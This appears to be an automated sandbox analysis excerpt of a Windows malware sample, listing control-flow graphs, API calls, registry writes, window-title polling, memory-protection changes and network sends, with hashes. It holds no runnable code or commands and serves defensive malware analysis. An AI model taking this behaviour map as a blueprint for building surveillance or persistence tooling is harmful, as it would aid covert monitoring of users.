                                                                                                                                                                                                                              control_flow_graph 1377 41bce3-41bd10 LoadLibraryA 1379 41bd22-41bd39 1377->1379 1380 41bd12-41bd1d 1377->1380 1385 41bd4b-41be6e LoadLibraryA 1379->1385 1386 41bd3b-41bd46 1379->1386 1380->1379 1386->1385
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(0046BE5C,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,0046BFAC,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                              • String ID: GetProcessImageFileNameW$Iphlpapi$SetProcessDpiAwareness$kernel32$ntdll
                                                                                                                                                                                                                              • API String ID: 1029625771-4276171397
                                                                                                                                                                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                              • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1453 1000c7e6-1000c7ed GetModuleHandleA 1454 1000c82d 1453->1454 1455 1000c7ef-1000c7fe call 1000c803 1453->1455 1456 1000c82f-1000c833 1454->1456 1464 1000c800-1000c80b GetProcAddress 1455->1464 1465 1000c865 1455->1465 1459 1000c872 call 1000c877 1456->1459 1460 1000c835-1000c83d GetModuleHandleA 1456->1460 1463 1000c83f-1000c847 1460->1463 1463->1463 1466 1000c849-1000c84c 1463->1466 1464->1454 1468 1000c80d-1000c81a VirtualProtect 1464->1468 1467 1000c866-1000c86e 1465->1467 1466->1456 1469 1000c84e-1000c850 1466->1469 1477 1000c870 1467->1477 1473 1000c82c 1468->1473 1474 1000c81c-1000c82a VirtualProtect 1468->1474 1470 1000c852-1000c854 1469->1470 1471 1000c856-1000c85e 1469->1471 1475 1000c85f-1000c860 GetProcAddress 1470->1475 1471->1475 1473->1454 1474->1473 1475->1465 1477->1466
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                                                                • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                              • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1525 409d97-409da7 1526 409e44-409e47 1525->1526 1527 409dad-409daf 1525->1527 1528 409db2-409dd8 call 401e07 CreateFileW 1527->1528 1531 409e18 1528->1531 1532 409dda-409de8 GetFileSize 1528->1532 1533 409e1b-409e1f 1531->1533 1534 409dea 1532->1534 1535 409e0f-409e16 CloseHandle 1532->1535 1533->1528 1536 409e21-409e24 1533->1536 1537 409df4-409dfb 1534->1537 1538 409dec-409df2 1534->1538 1535->1533 1536->1526 1539 409e26-409e2d 1536->1539 1540 409e04-409e09 Sleep 1537->1540 1541 409dfd-409dff call 40a7f0 1537->1541 1538->1535 1538->1537 1539->1526 1542 409e2f-409e3f call 4082dc call 4098a5 1539->1542 1540->1535 1541->1540 1542->1526
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                              • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                                                              • String ID: `AG
                                                                                                                                                                                                                              • API String ID: 1958988193-3058481221
                                                                                                                                                                                                                              • Opcode ID: 75e7fd678ed2f7c0c2e949815b1bdc0f2cc1c3ddce83e06ffb6a35647be39129
                                                                                                                                                                                                                              • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75e7fd678ed2f7c0c2e949815b1bdc0f2cc1c3ddce83e06ffb6a35647be39129
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1547 4126d2-4126e9 RegCreateKeyA 1548 412722 1547->1548 1549 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1547->1549 1551 412724-412730 call 401eea 1548->1551 1549->1551
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,<gF), ref: 004126E1
                                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(<gF,?,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,hHgF,0046673C), ref: 00412709
                                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?,?,?,0040E5FB,hHgF,0046673C), ref: 00412714
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                              • String ID: <gF$pth_unenc
                                                                                                                                                                                                                              • API String ID: 1818849710-2686227271
                                                                                                                                                                                                                              • Opcode ID: 36534823d3ce9f98563c4483b9d5abfbf4d581a051d435d494d2af73573a8983
                                                                                                                                                                                                                              • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36534823d3ce9f98563c4483b9d5abfbf4d581a051d435d494d2af73573a8983
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1557 410b19-410b3a call 4105b9 1560 410b40-410b49 1557->1560 1561 410d6f 1557->1561 1562 410d64 1560->1562 1563 410b4f-410b61 call 4105b9 1560->1563 1564 410d71-410d78 1561->1564 1565 410d69 SetLastError 1562->1565 1563->1561 1568 410b67-410b72 1563->1568 1565->1561 1568->1562 1569 410b78-410b81 1568->1569 1569->1562 1570 410b87-410b8b 1569->1570 1570->1562 1571 410b91-410b9e 1570->1571 1572 410ba0 1571->1572 1573 410bbf-410be5 GetNativeSystemInfo call 4105ab * 2 1571->1573 1574 410ba3-410bbd 1572->1574 1573->1562 1579 410beb-410c05 call 410abe 1573->1579 1574->1573 1574->1574 1582 410c07-410c1d call 410abe 1579->1582 1583 410c26-410c3b GetProcessHeap RtlAllocateHeap 1579->1583 1582->1583 1591 410c1f-410c21 1582->1591 1585 410c3d-410c4d call 410ad5 1583->1585 1586 410c4f-410c9a call 4105b9 1583->1586 1585->1591 1593 410ca0-410ce2 call 410abe call 4105cc 1586->1593 1594 410d45-410d4c call 410eb0 1586->1594 1591->1565 1593->1594 1602 410ce4-410cec 1593->1602 1594->1561 1603 410cf7-410cf9 1602->1603 1604 410cee-410cf5 call 4108d5 1602->1604 1606 410cfa-410d06 call 410975 1603->1606 1604->1606 1606->1594 1610 410d08-410d0a call 410769 1606->1610 1612 410d0f-410d11 1610->1612 1612->1594 1613 410d13-410d1c call 4108a4 1612->1613 1613->1594 1616 410d1e-410d25 1613->1616 1617 410d27-410d2d 1616->1617 1618 410d5c 1616->1618 1620 410d57-410d5a 1617->1620 1621 410d2f-410d38 1617->1621 1619 410d60-410d62 1618->1619 1619->1564 1620->1619 1623 410d3a-410d3f SetLastError 1621->1623 1624 410d4e-410d55 1621->1624 1623->1594 1624->1619
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00410C31
                                                                                                                                                                                                                              • SetLastError.KERNEL32(0000045A), ref: 00410D3F
                                                                                                                                                                                                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4001361727-0
                                                                                                                                                                                                                              • Opcode ID: d5c2a01c5980a64f5d2f421047647a0a2e4768dfdee4cbdfd5f87c29c1642d81
                                                                                                                                                                                                                              • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5c2a01c5980a64f5d2f421047647a0a2e4768dfdee4cbdfd5f87c29c1642d81
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1625 40a3f4-40a400 1626 40a402-40a406 1625->1626 1627 40a412-40a425 1626->1627 1628 40a408-40a40c 1626->1628 1630 40a427-40a439 1627->1630 1631 40a45c-40a482 Sleep GetForegroundWindow GetWindowTextLengthW call 40b027 1627->1631 1628->1627 1629 40a608-40a610 1628->1629 1630->1631 1635 40a43b-40a45b call 401e52 1630->1635 1634 40a487-40a489 1631->1634 1636 40a533-40a546 call 40ae58 call 41aca0 1634->1636 1637 40a48f-40a4ba call 4022f8 call 401e07 GetWindowTextW call 40b131 1634->1637 1635->1631 1650 40a5f1-40a5fa call 401e13 1636->1650 1651 40a54c 1636->1651 1637->1636 1656 40a4bc-40a4ef call 40affa call 4022f8 call 4082a8 1637->1656 1650->1626 1655 40a550-40a554 1651->1655 1658 40a560-40a567 call 41aca0 1655->1658 1659 40a556-40a55a 1655->1659 1675 40a4f1-40a500 call 4082dc call 40a876 1656->1675 1676 40a502-40a52e call 40b0dd call 4028cf call 409d58 call 401e13 1656->1676 1666 40a569-40a57a Sleep 1658->1666 1667 40a57c-40a5ec call 401f66 call 404c9e call 405ce6 call 41ae08 call 409d58 call 401eea * 3 1658->1667 1659->1658 1662 40a5ff-40a603 call 401e13 1659->1662 1662->1629 1666->1655 1667->1650 1675->1636 1676->1636
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                                                                                • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$SleepText$EventForegroundLength
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 828943121-0
                                                                                                                                                                                                                              • Opcode ID: 7d6c7a80a8588e4dd5705e398200286bf3296ec591e0c7003ee8c5439a844975
                                                                                                                                                                                                                              • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d6c7a80a8588e4dd5705e398200286bf3296ec591e0c7003ee8c5439a844975
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                                                                • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                                                                • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2099061454-0
                                                                                                                                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                              • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4127465137.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127439408.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 0000000B.00000002.4127465137.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_10000000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2152742572-0
                                                                                                                                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                              • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • send.WS2_32(00000284,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000,LAL), ref: 0040450E
                                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00414CE9,0000004C), ref: 0040453C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EventObjectSingleWaitsend
                                                                                                                                                                                                                              • String ID: LAL
                                                                                                                                                                                                                              • API String ID: 3963590051-3302426157
                                                                                                                                                                                                                              • Opcode ID: c01045b0fc5ec34aa7b775e7f5bd8615eb1627d72fad9cc7689b2927337d7a5d
                                                                                                                                                                                                                              • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c01045b0fc5ec34aa7b775e7f5bd8615eb1627d72fad9cc7689b2927337d7a5d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00008993,?,00000000,00000000), ref: 0040993A
                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,00465B24,?), ref: 0040A884
                                                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                                                                                              • String ID: $[F
                                                                                                                                                                                                                              • API String ID: 465354869-116741908
                                                                                                                                                                                                                              • Opcode ID: f88d5094532469310a208b54adbb5f1847e24a41b2c703938330a33a7f48d37a
                                                                                                                                                                                                                              • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f88d5094532469310a208b54adbb5f1847e24a41b2c703938330a33a7f48d37a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                              • String ID: TUF
                                                                                                                                                                                                                              • API String ID: 1818849710-3431404234
                                                                                                                                                                                                                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3360349984-0
                                                                                                                                                                                                                              • Opcode ID: 9b832d53b73dd47a5226d70bb6e0b6088c08d7e9c3a60a37f2d0d04f2614b6fc
                                                                                                                                                                                                                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b832d53b73dd47a5226d70bb6e0b6088c08d7e9c3a60a37f2d0d04f2614b6fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000080,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,00466330), ref: 0041B5CE
                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000B.00000002.4123803181.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_11_2_401000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3604237281-0
                                                                                                                                                                                                                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                              • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                                                                                                                                              Memory Dump Source
